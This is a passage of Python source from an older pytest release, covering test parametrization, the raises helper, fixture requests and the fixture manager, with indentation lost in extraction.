:arg argvalues: The list of argvalues determines how often a
test is invoked with different argument values. If only one
argname was specified argvalues is a list of simple values. If N
argnames were specified, argvalues must be a list of N-tuples,
where each tuple-element specifies a value for its respective
argname.
:arg indirect: if True each argvalue corresponding to an argname will
be passed as request.param to its respective argname fixture
function so that it can perform more expensive setups during the
setup phase of a test rather than at collection time.
:arg ids: list of string ids, or a callable.
If strings, each is corresponding to the argvalues so that they are
part of the test id.
If callable, it should take one argument (a single argvalue) and return
a string or return None. If None, the automatically generated id for that
argument will be used.
If no ids are provided they will be generated automatically from
the argvalues.
:arg scope: if specified it denotes the scope of the parameters.
The scope is used for grouping tests by parameter instances.
It will also override any fixture-function defined scope, allowing
to set a dynamic scope using test context or configuration.
"""
# individual parametrized argument sets can be wrapped in a series
# of markers in which case we unwrap the values and apply the mark
# at Function init
newkeywords = {}
unwrapped_argvalues = []
for i, argval in enumerate(argvalues):
while isinstance(argval, MarkDecorator):
newmark = MarkDecorator(argval.markname,
argval.args[:-1], argval.kwargs)
newmarks = newkeywords.setdefault(i, {})
newmarks[newmark.markname] = newmark
argval = argval.args[-1]
unwrapped_argvalues.append(argval)
argvalues = unwrapped_argvalues
if not isinstance(argnames, (tuple, list)):
argnames = [x.strip() for x in argnames.split(",") if x.strip()]
if len(argnames) == 1:
argvalues = [(val,) for val in argvalues]
if not argvalues:
argvalues = [(_notexists,) * len(argnames)]
if scope is None:
scope = "function"
scopenum = scopes.index(scope)
if not indirect:
#XXX should we also check for the opposite case?
for arg in argnames:
if arg not in self.fixturenames:
raise ValueError("%r uses no fixture %r" %(
self.function, arg))
valtype = indirect and "params" or "funcargs"
idfn = None
if callable(ids):
idfn = ids
ids = None
if ids and len(ids) != len(argvalues):
raise ValueError('%d tests specified with %d ids' %(
len(argvalues), len(ids)))
if not ids:
ids = idmaker(argnames, argvalues, idfn)
newcalls = []
for callspec in self._calls or [CallSpec2(self)]:
for param_index, valset in enumerate(argvalues):
assert len(valset) == len(argnames)
newcallspec = callspec.copy(self)
newcallspec.setmulti(valtype, argnames, valset, ids[param_index],
newkeywords.get(param_index, {}), scopenum,
param_index)
newcalls.append(newcallspec)
self._calls = newcalls
def addcall(self, funcargs=None, id=_notexists, param=_notexists):
""" (deprecated, use parametrize) Add a new call to the underlying
test function during the collection phase of a test run. Note that
request.addcall() is called during the test collection phase prior and
independently to actual test execution. You should only use addcall()
if you need to specify multiple arguments of a test function.
:arg funcargs: argument keyword dictionary used when invoking
the test function.
:arg id: used for reporting and identification purposes. If you
don't supply an `id` an automatic unique id will be generated.
:arg param: a parameter which will be exposed to a later fixture function
invocation through the ``request.param`` attribute.
"""
assert funcargs is None or isinstance(funcargs, dict)
if funcargs is not None:
for name in funcargs:
if name not in self.fixturenames:
pytest.fail("funcarg %r not used in this function." % name)
else:
funcargs = {}
if id is None:
raise ValueError("id=None not allowed")
if id is _notexists:
id = len(self._calls)
id = str(id)
if id in self._ids:
raise ValueError("duplicate id %r" % id)
self._ids.add(id)
cs = CallSpec2(self)
cs.setall(funcargs, id, param)
self._calls.append(cs)
def _idval(val, argname, idx, idfn):
if idfn:
try:
s = idfn(val)
if s:
return s
except Exception:
pass
if isinstance(val, (float, int, str, bool, NoneType)):
return str(val)
elif isinstance(val, REGEX_TYPE):
return val.pattern
elif enum is not None and isinstance(val, enum.Enum):
return str(val)
elif isclass(val) and hasattr(val, '__name__'):
return val.__name__
return str(argname)+str(idx)
def _idvalset(idx, valset, argnames, idfn):
this_id = [_idval(val, argname, idx, idfn)
for val, argname in zip(valset, argnames)]
return "-".join(this_id)
def idmaker(argnames, argvalues, idfn=None):
ids = [_idvalset(valindex, valset, argnames, idfn)
for valindex, valset in enumerate(argvalues)]
if len(set(ids)) < len(ids):
# user may have provided a bad idfn which means the ids are not unique
ids = [str(i) + testid for i, testid in enumerate(ids)]
return ids
def showfixtures(config):
from _pytest.main import wrap_session
return wrap_session(config, _showfixtures_main)
def _showfixtures_main(config, session):
import _pytest.config
session.perform_collect()
curdir = py.path.local()
tw = _pytest.config.create_terminal_writer(config)
verbose = config.getvalue("verbose")
fm = session._fixturemanager
available = []
for argname, fixturedefs in fm._arg2fixturedefs.items():
assert fixturedefs is not None
if not fixturedefs:
continue
fixturedef = fixturedefs[-1]
loc = getlocation(fixturedef.func, curdir)
available.append((len(fixturedef.baseid),
fixturedef.func.__module__,
curdir.bestrelpath(loc),
fixturedef.argname, fixturedef))
available.sort()
currentmodule = None
for baseid, module, bestrel, argname, fixturedef in available:
if currentmodule != module:
if not module.startswith("_pytest."):
tw.line()
tw.sep("-", "fixtures defined from %s" %(module,))
currentmodule = module
if verbose <= 0 and argname[0] == "_":
continue
if verbose > 0:
funcargspec = "%s -- %s" %(argname, bestrel,)
else:
funcargspec = argname
tw.line(funcargspec, green=True)
loc = getlocation(fixturedef.func, curdir)
doc = fixturedef.func.__doc__ or ""
if doc:
for line in doc.strip().split("\n"):
tw.line(" " + line.strip())
else:
tw.line(" %s: no docstring available" %(loc,),
red=True)
def getlocation(function, curdir):
import inspect
fn = py.path.local(inspect.getfile(function))
lineno = py.builtin._getcode(function).co_firstlineno
if fn.relto(curdir):
fn = fn.relto(curdir)
return "%s:%d" %(fn, lineno+1)
# builtin pytest.raises helper
def raises(expected_exception, *args, **kwargs):
""" assert that a code block/function call raises @expected_exception
and raise a failure exception otherwise.
This helper produces a ``py.code.ExceptionInfo()`` object.
If using Python 2.5 or above, you may use this function as a
context manager::
>>> with raises(ZeroDivisionError):
... 1/0
Or you can specify a callable by passing a to-be-called lambda::
>>> raises(ZeroDivisionError, lambda: 1/0)
<ExceptionInfo ...>
or you can specify an arbitrary callable with arguments::
>>> def f(x): return 1/x
...
>>> raises(ZeroDivisionError, f, 0)
<ExceptionInfo ...>
>>> raises(ZeroDivisionError, f, x=0)
<ExceptionInfo ...>
A third possibility is to use a string to be executed::
>>> raises(ZeroDivisionError, "f(0)")
<ExceptionInfo ...>
Performance note:
-----------------
Similar to caught exception objects in Python, explicitly clearing
local references to returned ``py.code.ExceptionInfo`` objects can
help the Python interpreter speed up its garbage collection.
Clearing those references breaks a reference cycle
(``ExceptionInfo`` --> caught exception --> frame stack raising
the exception --> current frame stack --> local variables -->
``ExceptionInfo``) which makes Python keep all objects referenced
from that cycle (including all local variables in the current
frame) alive until the next cyclic garbage collection run. See the
official Python ``try`` statement documentation for more detailed
information.
"""
__tracebackhide__ = True
if expected_exception is AssertionError:
# we want to catch a AssertionError
# replace our subclass with the builtin one
# see https://github.com/pytest-dev/pytest/issues/176
from _pytest.assertion.util import BuiltinAssertionError \
as expected_exception
msg = ("exceptions must be old-style classes or"
" derived from BaseException, not %s")
if isinstance(expected_exception, tuple):
for exc in expected_exception:
if not isclass(exc):
raise TypeError(msg % type(exc))
elif not isclass(expected_exception):
raise TypeError(msg % type(expected_exception))
if not args:
return RaisesContext(expected_exception)
elif isinstance(args[0], str):
code, = args
assert isinstance(code, str)
frame = sys._getframe(1)
loc = frame.f_locals.copy()
loc.update(kwargs)
#print "raises frame scope: %r" % frame.f_locals
try:
code = py.code.Source(code).compile()
py.builtin.exec_(code, frame.f_globals, loc)
# XXX didn'T mean f_globals == f_locals something special?
# this is destroyed here ...
except expected_exception:
return py.code.ExceptionInfo()
else:
func = args[0]
try:
func(*args[1:], **kwargs)
except expected_exception:
return py.code.ExceptionInfo()
pytest.fail("DID NOT RAISE")
class RaisesContext(object):
def __init__(self, expected_exception):
self.expected_exception = expected_exception
self.excinfo = None
def __enter__(self):
self.excinfo = object.__new__(py.code.ExceptionInfo)
return self.excinfo
def __exit__(self, *tp):
__tracebackhide__ = True
if tp[0] is None:
pytest.fail("DID NOT RAISE")
if sys.version_info < (2, 7):
# py26: on __exit__() exc_value often does not contain the
# exception value.
# http://bugs.python.org/issue7853
if not isinstance(tp[1], BaseException):
exc_type, value, traceback = tp
tp = exc_type, exc_type(value), traceback
self.excinfo.__init__(tp)
return issubclass(self.excinfo.type, self.expected_exception)
#
# the basic pytest Function item
#
class Function(FunctionMixin, pytest.Item, FuncargnamesCompatAttr):
""" a Function Item is responsible for setting up and executing a
Python test function.
"""
_genid = None
def __init__(self, name, parent, args=None, config=None,
callspec=None, callobj=NOTSET, keywords=None, session=None,
fixtureinfo=None):
super(Function, self).__init__(name, parent, config=config,
session=session)
self._args = args
if callobj is not NOTSET:
self.obj = callobj
self.keywords.update(self.obj.__dict__)
if callspec:
self.callspec = callspec
self.keywords.update(callspec.keywords)
if keywords:
self.keywords.update(keywords)
if fixtureinfo is None:
fixtureinfo = self.session._fixturemanager.getfixtureinfo(
self.parent, self.obj, self.cls,
funcargs=not self._isyieldedfunction())
self._fixtureinfo = fixtureinfo
self.fixturenames = fixtureinfo.names_closure
self._initrequest()
def _initrequest(self):
self.funcargs = {}
if self._isyieldedfunction():
assert not hasattr(self, "callspec"), (
"yielded functions (deprecated) cannot have funcargs")
else:
if hasattr(self, "callspec"):
callspec = self.callspec
assert not callspec.funcargs
self._genid = callspec.id
if hasattr(callspec, "param"):
self.param = callspec.param
self._request = FixtureRequest(self)
@property
def function(self):
"underlying python 'function' object"
return getattr(self.obj, 'im_func', self.obj)
def _getobj(self):
name = self.name
i = name.find("[") # parametrization
if i != -1:
name = name[:i]
return getattr(self.parent.obj, name)
@property
def _pyfuncitem(self):
"(compatonly) for code expecting pytest-2.2 style request objects"
return self
def _isyieldedfunction(self):
return getattr(self, "_args", None) is not None
def runtest(self):
""" execute the underlying test function. """
self.ihook.pytest_pyfunc_call(pyfuncitem=self)
def setup(self):
# check if parametrization happend with an empty list
try:
self.callspec._emptyparamspecified
except AttributeError:
pass
else:
fs, lineno = self._getfslineno()
pytest.skip("got empty parameter set, function %s at %s:%d" %(
self.function.__name__, fs, lineno))
super(Function, self).setup()
fillfixtures(self)
scope2props = dict(session=())
scope2props["module"] = ("fspath", "module")
scope2props["class"] = scope2props["module"] + ("cls",)
scope2props["instance"] = scope2props["class"] + ("instance", )
scope2props["function"] = scope2props["instance"] + ("function", "keywords")
def scopeproperty(name=None, doc=None):
def decoratescope(func):
scopename = name or func.__name__
def provide(self):
if func.__name__ in scope2props[self.scope]:
return func(self)
raise AttributeError("%s not available in %s-scoped context" % (
scopename, self.scope))
return property(provide, None, None, func.__doc__)
return decoratescope
class FixtureRequest(FuncargnamesCompatAttr):
""" A request for a fixture from a test or fixture function.
A request object gives access to the requesting test context
and has an optional ``param`` attribute in case
the fixture is parametrized indirectly.
"""
def __init__(self, pyfuncitem):
self._pyfuncitem = pyfuncitem
#: fixture for which this request is being performed
self.fixturename = None
#: Scope string, one of "function", "cls", "module", "session"
self.scope = "function"
self._funcargs = {}
self._fixturedefs = {}
fixtureinfo = pyfuncitem._fixtureinfo
self._arg2fixturedefs = fixtureinfo.name2fixturedefs.copy()
self._arg2index = {}
self.fixturenames = fixtureinfo.names_closure
self._fixturemanager = pyfuncitem.session._fixturemanager
@property
def node(self):
""" underlying collection node (depends on current request scope)"""
return self._getscopeitem(self.scope)
def _getnextfixturedef(self, argname):
fixturedefs = self._arg2fixturedefs.get(argname, None)
if fixturedefs is None:
# we arrive here because of a a dynamic call to
# getfuncargvalue(argname) usage which was naturally
# not known at parsing/collection time
fixturedefs = self._fixturemanager.getfixturedefs(
argname, self._pyfuncitem.parent.nodeid)
self._arg2fixturedefs[argname] = fixturedefs
# fixturedefs list is immutable so we maintain a decreasing index
index = self._arg2index.get(argname, 0) - 1
if fixturedefs is None or (-index > len(fixturedefs)):
raise FixtureLookupError(argname, self)
self._arg2index[argname] = index
return fixturedefs[index]
@property
def config(self):
""" the pytest config object associated with this request. """
return self._pyfuncitem.config
@scopeproperty()
def function(self):
""" test function object if the request has a per-function scope. """
return self._pyfuncitem.obj
@scopeproperty("class")
def cls(self):
""" class (can be None) where the test function was collected. """
clscol = self._pyfuncitem.getparent(pytest.Class)
if clscol:
return clscol.obj
@property
def instance(self):
""" instance (can be None) on which test function was collected. """
# unittest support hack, see _pytest.unittest.TestCaseFunction
try:
return self._pyfuncitem._testcase
except AttributeError:
function = getattr(self, "function", None)
if function is not None:
return py.builtin._getimself(function)
@scopeproperty()
def module(self):
""" python module object where the test function was collected. """
return self._pyfuncitem.getparent(pytest.Module).obj
@scopeproperty()
def fspath(self):
""" the file system path of the test module which collected this test. """
return self._pyfuncitem.fspath
@property
def keywords(self):
""" keywords/markers dictionary for the underlying node. """
return self.node.keywords
@property
def session(self):
""" pytest session object. """
return self._pyfuncitem.session
def addfinalizer(self, finalizer):
""" add finalizer/teardown function to be called after the
last test within the requesting test context finished
execution. """
# XXX usually this method is shadowed by fixturedef specific ones
self._addfinalizer(finalizer, scope=self.scope)
def _addfinalizer(self, finalizer, scope):
colitem = self._getscopeitem(scope)
self._pyfuncitem.session._setupstate.addfinalizer(
finalizer=finalizer, colitem=colitem)
def applymarker(self, marker):
""" Apply a marker to a single test function invocation.
This method is useful if you don't want to have a keyword/marker
on all function invocations.
:arg marker: a :py:class:`_pytest.mark.MarkDecorator` object
created by a call to ``pytest.mark.NAME(...)``.
"""
try:
self.node.keywords[marker.markname] = marker
except AttributeError:
raise ValueError(marker)
def raiseerror(self, msg):
""" raise a FixtureLookupError with the given message. """
raise self._fixturemanager.FixtureLookupError(None, self, msg)
def _fillfixtures(self):
item = self._pyfuncitem
fixturenames = getattr(item, "fixturenames", self.fixturenames)
for argname in fixturenames:
if argname not in item.funcargs:
item.funcargs[argname] = self.getfuncargvalue(argname)
def cached_setup(self, setup, teardown=None, scope="module", extrakey=None):
""" (deprecated) Return a testing resource managed by ``setup`` &
``teardown`` calls. ``scope`` and ``extrakey`` determine when the
``teardown`` function will be called so that subsequent calls to
``setup`` would recreate the resource. With pytest-2.3 you often
do not need ``cached_setup()`` as you can directly declare a scope
on a fixture function and register a finalizer through
``request.addfinalizer()``.
:arg teardown: function receiving a previously setup resource.
:arg setup: a no-argument function creating a resource.
:arg scope: a string value out of ``function``, ``class``, ``module``
or ``session`` indicating the caching lifecycle of the resource.
:arg extrakey: added to internal caching key of (funcargname, scope).
"""
if not hasattr(self.config, '_setupcache'):
self.config._setupcache = {} # XXX weakref?
cachekey = (self.fixturename, self._getscopeitem(scope), extrakey)
cache = self.config._setupcache
try:
val = cache[cachekey]
except KeyError:
self._check_scope(self.fixturename, self.scope, scope)
val = setup()
cache[cachekey] = val
if teardown is not None:
def finalizer():
del cache[cachekey]
teardown(val)
self._addfinalizer(finalizer, scope=scope)
return val
def getfuncargvalue(self, argname):
""" Dynamically retrieve a named fixture function argument.
As of pytest-2.3, it is easier and usually better to access other
fixture values by stating it as an input argument in the fixture
function. If you only can decide about using another fixture at test
setup time, you may use this function to retrieve it inside a fixture
function body.
"""
return self._get_active_fixturedef(argname).cached_result[0]
def _get_active_fixturedef(self, argname):
try:
return self._fixturedefs[argname]
except KeyError:
try:
fixturedef = self._getnextfixturedef(argname)
except FixtureLookupError:
if argname == "request":
class PseudoFixtureDef:
cached_result = (self, [0], None)
scope = "function"
return PseudoFixtureDef
raise
# remove indent to prevent the python3 exception
# from leaking into the call
result = self._getfuncargvalue(fixturedef)
self._funcargs[argname] = result
self._fixturedefs[argname] = fixturedef
return fixturedef
def _get_fixturestack(self):
current = self
l = []
while 1:
fixturedef = getattr(current, "_fixturedef", None)
if fixturedef is None:
l.reverse()
return l
l.append(fixturedef)
current = current._parent_request
def _getfuncargvalue(self, fixturedef):
# prepare a subrequest object before calling fixture function
# (latter managed by fixturedef)
argname = fixturedef.argname
funcitem = self._pyfuncitem
scope = fixturedef.scope
try:
param = funcitem.callspec.getparam(argname)
except (AttributeError, ValueError):
param = NOTSET
param_index = 0
else:
# indices might not be set if old-style metafunc.addcall() was used
param_index = funcitem.callspec.indices.get(argname, 0)
# if a parametrize invocation set a scope it will override
# the static scope defined with the fixture function
paramscopenum = funcitem.callspec._arg2scopenum.get(argname)
if paramscopenum is not None:
scope = scopes[paramscopenum]
subrequest = SubRequest(self, scope, param, param_index, fixturedef)
# check if a higher-level scoped fixture accesses a lower level one
subrequest._check_scope(argname, self.scope, scope)
# clear sys.exc_info before invoking the fixture (python bug?)
# if its not explicitly cleared it will leak into the call
exc_clear()
try:
# call the fixture function
val = fixturedef.execute(request=subrequest)
finally:
# if fixture function failed it might have registered finalizers
self.session._setupstate.addfinalizer(fixturedef.finish,
subrequest.node)
return val
def _check_scope(self, argname, invoking_scope, requested_scope):
if argname == "request":
return
if scopemismatch(invoking_scope, requested_scope):
# try to report something helpful
lines = self._factorytraceback()
pytest.fail("ScopeMismatch: You tried to access the %r scoped "
"fixture %r with a %r scoped request object, "
"involved factories\n%s" %(
(requested_scope, argname, invoking_scope, "\n".join(lines))),
pytrace=False)
def _factorytraceback(self):
lines = []
for fixturedef in self._get_fixturestack():
factory = fixturedef.func
fs, lineno = getfslineno(factory)
p = self._pyfuncitem.session.fspath.bestrelpath(fs)
args = inspect.formatargspec(*inspect.getargspec(factory))
lines.append("%s:%d: def %s%s" %(
p, lineno, factory.__name__, args))
return lines
def _getscopeitem(self, scope):
if scope == "function":
# this might also be a non-function Item despite its attribute name
return self._pyfuncitem
node = get_scope_node(self._pyfuncitem, scope)
if node is None and scope == "class":
# fallback to function item itself
node = self._pyfuncitem
assert node
return node
def __repr__(self):
return "<FixtureRequest for %r>" %(self.node)
class SubRequest(FixtureRequest):
""" a sub request for handling getting a fixture from a
test function/fixture. """
def __init__(self, request, scope, param, param_index, fixturedef):
self._parent_request = request
self.fixturename = fixturedef.argname
if param is not NOTSET:
self.param = param
self.param_index = param_index
self.scope = scope
self._fixturedef = fixturedef
self.addfinalizer = fixturedef.addfinalizer
self._pyfuncitem = request._pyfuncitem
self._funcargs = request._funcargs
self._fixturedefs = request._fixturedefs
self._arg2fixturedefs = request._arg2fixturedefs
self._arg2index = request._arg2index
self.fixturenames = request.fixturenames
self._fixturemanager = request._fixturemanager
def __repr__(self):
return "<SubRequest %r for %r>" % (self.fixturename, self._pyfuncitem)
class ScopeMismatchError(Exception):
""" A fixture function tries to use a different fixture function which
which has a lower scope (e.g. a Session one calls a function one)
"""
scopes = "session module class function".split()
scopenum_function = scopes.index("function")
def scopemismatch(currentscope, newscope):
return scopes.index(newscope) > scopes.index(currentscope)
class FixtureLookupError(LookupError):
""" could not return a requested Fixture (missing or invalid). """
def __init__(self, argname, request, msg=None):
self.argname = argname
self.request = request
self.fixturestack = request._get_fixturestack()
self.msg = msg
def formatrepr(self):
tblines = []
addline = tblines.append
stack = [self.request._pyfuncitem.obj]
stack.extend(map(lambda x: x.func, self.fixturestack))
msg = self.msg
if msg is not None:
stack = stack[:-1] # the last fixture raise an error, let's present
# it at the requesting side
for function in stack:
fspath, lineno = getfslineno(function)
try:
lines, _ = inspect.getsourcelines(get_real_func(function))
except IOError:
error_msg = "file %s, line %s: source code not available"
addline(error_msg % (fspath, lineno+1))
else:
addline("file %s, line %s" % (fspath, lineno+1))
for i, line in enumerate(lines):
line = line.rstrip()
addline(" " + line)
if line.lstrip().startswith('def'):
break
if msg is None:
fm = self.request._fixturemanager
available = []
for name, fixturedef in fm._arg2fixturedefs.items():
parentid = self.request._pyfuncitem.parent.nodeid
faclist = list(fm._matchfactories(fixturedef, parentid))
if faclist:
available.append(name)
msg = "fixture %r not found" % (self.argname,)
msg += "\n available fixtures: %s" %(", ".join(available),)
msg += "\n use 'py.test --fixtures [testpath]' for help on them."
return FixtureLookupErrorRepr(fspath, lineno, tblines, msg, self.argname)
class FixtureLookupErrorRepr(TerminalRepr):
def __init__(self, filename, firstlineno, tblines, errorstring, argname):
self.tblines = tblines
self.errorstring = errorstring
self.filename = filename
self.firstlineno = firstlineno
self.argname = argname
def toterminal(self, tw):
#tw.line("FixtureLookupError: %s" %(self.argname), red=True)
for tbline in self.tblines:
tw.line(tbline.rstrip())
for line in self.errorstring.split("\n"):
tw.line(" " + line.strip(), red=True)
tw.line()
tw.line("%s:%d" % (self.filename, self.firstlineno+1))
class FixtureManager:
"""
pytest fixtures definitions and information is stored and managed
from this class.
During collection fm.parsefactories() is called multiple times to parse
fixture function definitions into FixtureDef objects and internal
data structures.
During collection of test functions, metafunc-mechanics instantiate
a FuncFixtureInfo object which is cached per node/func-name.
This FuncFixtureInfo object is later retrieved by Function nodes
which themselves offer a fixturenames attribute.
The FuncFixtureInfo object holds information about fixtures and FixtureDefs
relevant for a particular function. An initial list of fixtures is
assembled like this:
- ini-defined usefixtures
- autouse-marked fixtures along the collection chain up from the function
- usefixtures markers at module/class/function level
- test function funcargs
Subsequently the funcfixtureinfo.fixturenames attribute is computed
as the closure of the fixtures needed to setup the initial fixtures,
i. e. fixtures needed by fixture functions themselves are appended
to the fixturenames list.
Upon the test-setup phases all fixturenames are instantiated, retrieved
by a lookup of their FuncFixtureInfo.
"""
_argprefix = "pytest_funcarg__"
FixtureLookupError = FixtureLookupError
FixtureLookupErrorRepr = FixtureLookupErrorRepr
def __init__(self, session):
self.session = session
self.config = session.config
self._arg2fixturedefs = {}
self._holderobjseen = set()
self._arg2finish = {}
self._nodeid_and_autousenames = [("", self.config.getini("usefixtures"))]
session.config.pluginmanager.register(self, "funcmanage")
def getfixtureinfo(self, node, func, cls, funcargs=True):
if funcargs and not hasattr(node, "nofuncargs"):
if cls is not None:
startindex = 1
else:
startindex = None
argnames = getfuncargnames(func, startindex)
else:
argnames = ()
usefixtures = getattr(func, "usefixtures", None)
initialnames = argnames
if usefixtures is not None:
initialnames = usefixtures.args + initialnames
fm = node.session._fixturemanager
names_closure, arg2fixturedefs = fm.getfixtureclosure(initialnames,
node)
return FuncFixtureInfo(argnames, names_closure, arg2fixturedefs)
def pytest_plugin_registered(self, plugin):
nodeid = None
try:
p = py.path.local(plugin.__file__)
except AttributeError:
pass
else:
# construct the base nodeid which is later used to check
# what fixtures are visible for particular tests (as denoted
# by their test id)
if p.basename.startswith("conftest.py"):
nodeid = p.dirpath().relto(self.config.rootdir)
if p.sep != "/":
nodeid = nodeid.replace(p.sep, "/")
self.parsefactories(plugin, nodeid)
def _getautousenames(self, nodeid):
""" return a tuple of fixture names to be used. """
autousenames = []
for baseid, basenames in self._nodeid_and_autousenames:
if nodeid.startswith(baseid):
if baseid:
i = len(baseid)
nextchar = nodeid[i:i+1]
if nextchar and nextchar not in ":/":
continue
autousenames.extend(basenames)
# make sure autousenames are sorted by scope, scopenum 0 is session
autousenames.sort(
key=lambda x: self._arg2fixturedefs[x][-1].scopenum)
return autousenames
def getfixtureclosure(self, fixturenames, parentnode):
# collect the closure of all fixtures , starting with the given
# fixturenames as the initial set. As we have to visit all
# factory definitions anyway, we also return a arg2fixturedefs
# mapping so that the caller can reuse it and does not have
# to re-discover fixturedefs again for each fixturename
# (discovering matching fixtures for a given name/node is expensive)
parentid = parentnode.nodeid
fixturenames_closure = self._getautousenames(parentid)
def merge(otherlist):
for arg in otherlist:
if arg not in fixturenames_closure:
fixturenames_closure.append(arg)
merge(fixturenames)
arg2fixturedefs = {}
lastlen = -1
while lastlen != len(fixturenames_closure):
lastlen = len(fixturenames_closure)
for argname in fixturenames_closure:
if argname in arg2fixturedefs:
continue
fixturedefs = self.getfixturedefs(argname, parentid)
if fixturedefs:
arg2fixturedefs[argname] = fixturedefs
merge(fixturedefs[-1].argnames)
return fixturenames_closure, arg2fixturedefs
def pytest_generate_tests(self, metafunc):
for argname in metafunc.fixturenames:
faclist = metafunc._arg2fixturedefs.get(argname)
if faclist:
fixturedef = faclist[-1]
if fixturedef.params is not None:
func_params = getattr(getattr(metafunc.function, 'parametrize', None), 'args', [[None]])
# skip directly parametrized arguments
if argname not in func_params:
metafunc.parametrize(argname, fixturedef.params,
indirect=True, scope=fixturedef.scope,
ids=fixturedef.ids)
else:
continue # will raise FixtureLookupError at setup time
def pytest_collection_modifyitems(self, items):
# separate parametrized setups
items[:] = reorder_items(items)
def parsefactories(self, node_or_obj, nodeid=NOTSET, unittest=False):
if nodeid is not NOTSET:
holderobj = node_or_obj
else:
holderobj = node_or_obj.obj
nodeid = node_or_obj.nodeid
if holderobj in self._holderobjseen:
return
self._holderobjseen.add(holderobj)
autousenames = []
for name in dir(holderobj):
obj = getattr(holderobj, name, None)
if not callable(obj):
continue
# fixture functions have a pytest_funcarg__ prefix (pre-2.3 style)
# or are "@pytest.fixture" marked
marker = getfixturemarker(obj)
if marker is None:
if not name.startswith(self._argprefix):
continue
marker = defaultfuncargprefixmarker
name = name[len(self._argprefix):]
elif not isinstance(marker, FixtureFunctionMarker):
# magic globals with __getattr__ might have got us a wrong
# fixture attribute
continue
else:
assert not name.startswith(self._argprefix)
fixturedef = FixtureDef(self, nodeid, name, obj,
marker.scope, marker.params,
yieldctx=marker.yieldctx,
unittest=unittest, ids=marker.ids)
faclist = self._arg2fixturedefs.setdefault(name, [])
if fixturedef.has_location:
faclist.append(fixturedef)
else:
# fixturedefs with no location are at the front
# so this inserts the current fixturedef after the
# existing fixturedefs from external plugins but
# before the fixturedefs provided in conftests.
i = len([f for f in faclist if not f.has_location])
faclist.insert(i, fixturedef)
if marker.autouse:
autousenames.append(name)
if autousenames:
self._nodeid_and_autousenames.append((nodeid or '', autousenames))
def getfixturedefs(self, argname, nodeid):
try:
fixturedefs = self._arg2fixturedefs[argname]
except KeyError:
return None
else:
return tuple(self._matchfactories(fixturedefs, nodeid))
def _matchfactories(self, fixturedefs, nodeid):
for fixturedef in fixturedefs:
if nodeid.startswith(fixturedef.baseid):
yield fixturedef
def fail_fixturefunc(fixturefunc, msg):
fs, lineno = getfslineno(fixturefunc)
location = "%s:%s" % (fs, lineno+1)
source = py.code.Source(fixturefunc)
pytest.fail(msg + ":\n\n" + str(source.indent()) + "\n" + location,
pytrace=False)
def call_fixture_func(fixturefunc, request, kwargs, yieldctx):
if yieldctx:
if not is_generator(fixturefunc):
fail_fixturefunc(fixturefunc,
msg="yield_fixture requires yield statement in function")
iter = fixturefunc(**kwargs)
next = getattr(iter, "__next__", None)
if next is None:
next = getattr(iter, "next")
res = next()
def teardown():
try:
next()
except StopIteration:
pass
else:
fail_fixturefunc(fixturefunc,
"yield_fixture function has more than one 'yield'")
request.addfinalizer(teardown)
else:
if is_generator(fixturefunc):
fail_fixturefunc(fixturefunc,
msg="pytest.fixture functions cannot use ``yield``. "
"Instead write and return an inner function/generator "
"and let the consumer call and iterate over it.")
res = fixturefunc(**kwargs)
return res
class FixtureDef:
""" A container for a factory definition. """
def __init__(self, fixturemanager, baseid, argname, func, scope, params,
yieldctx, unittest=False, ids=None):
self._fixturemanager = fixturemanager
self.baseid = baseid or ''
self.has_location = baseid is not None
self.func = func
self.argname = argname
self.scope = scope
self.scopenum = scopes.index(scope or "function")
self.params = params
startindex = unittest and 1 or None
self.argnames = getfuncargnames(func, startindex=startindex)
self.yieldctx = yieldctx
self.unittest = unittest
self.ids = ids
self._finalizer = []
def addfinalizer(self, finalizer):
self._finalizer.append(finalizer)
def finish(self):
try:
while self._finalizer:
func = self._finalizer.pop()
func()
finally:
# even if finalization fails, we invalidate
# the cached fixture value
if hasattr(self, "cached_result"):
del self.cached_result
def execute(self, request):
# get required arguments and register our own finish()
# with their finalization
kwargs = {}
for argname in self.argnames:
fixturedef = request._get_active_fixturedef(argname)
result, arg_cache_key, exc = fixturedef.cached_result
request._check_scope(argname, request.scope, fixturedef.scope)
kwargs[argname] = result
if argname != "request":
fixturedef.addfinalizer(self.finish)
my_cache_key = request.param_index
cached_result = getattr(self, "cached_result", None)
if cached_result is not None:
result, cache_key, err = cached_result
if my_cache_key == cache_key:
if err is not None:
py.builtin._reraise(*err)
else:
return result
# we have a previous but differently parametrized fixture instance
# so we need to tear it down before creating a new one
self.finish()
assert not hasattr(self, "cached_result")
fixturefunc = self.func
if self.unittest:
if request.instance is not None:
# bind the unbound method to the TestCase instance
fixturefunc = self.func.__get__(request.instance)
else:
# the fixture function needs to be bound to the actual
# request.instance so that code working with "self" behaves
# as expected.
if request.instance is not None:
fixturefunc = getimfunc(self.func)
if fixturefunc != self.func:
fixturefunc = fixturefunc.__get__(request.instance)
try:
result = call_fixture_func(fixturefunc, request, kwargs,
self.yieldctx)
except Exception:
self.cached_result = (None, my_cache_key, sys.exc_info())
raise
self.cached_result = (result, my_cache_key, None)
return result
def __repr__(self):
return ("<FixtureDef name=%r scope=%r baseid=%r >" %
(self.argname, self.scope, self.baseid))
def num_mock_patch_args(function):
""" return number of arguments used up by mock arguments (if any) """
patchings = getattr(function, "patchings", None)
if not patchings:
return 0
mock = sys.modules.get("mock", sys.modules.get("unittest.mock", None))
if mock is not None:
return len([p for p in patchings
if not p.attribute_name and p.new is mock.DEFAULT])
return len(patchings)
def getfuncargnames(function, startindex=None):
# XXX merge with main.py's varnames
#assert not inspect.isclass(function)
realfunction = function
while hasattr(realfunction, "__wrapped__"):
realfunction = realfunction.__wrapped__
if startindex is None:
startindex = inspect.ismethod(function) and 1 or 0
if realfunction != function:
startindex += num_mock_patch_args(function)
function = realfunction
if isinstance(function, functools.partial):
argnames = inspect.getargs(py.code.getrawcode(function.func))[0]
partial = function
argnames = argnames[len(partial.args):]
if partial.keywords:
for kw in partial.keywords:
argnames.remove(kw)
else:
argnames = inspect.getargs(py.code.getrawcode(function))[0]
defaults = getattr(function, 'func_defaults',
getattr(function, '__defaults__', None)) or ()
numdefaults = len(defaults)
if numdefaults:
return tuple(argnames[startindex:-numdefaults])
return tuple(argnames[startindex:])
# algorithm for sorting on a per-parametrized resource setup basis
# it is called for scopenum==0 (session) first and performs sorting
# down to the lower scopes such as to minimize number of "high scope"
# setups and teardowns
def reorder_items(items):
argkeys_cache = {}
for scopenum in range(0, scopenum_function):
argkeys_cache[scopenum] = d = {}
for item in items:
keys = set(get_parametrized_fixture_keys(item, scopenum))
if keys:
d[item] = keys
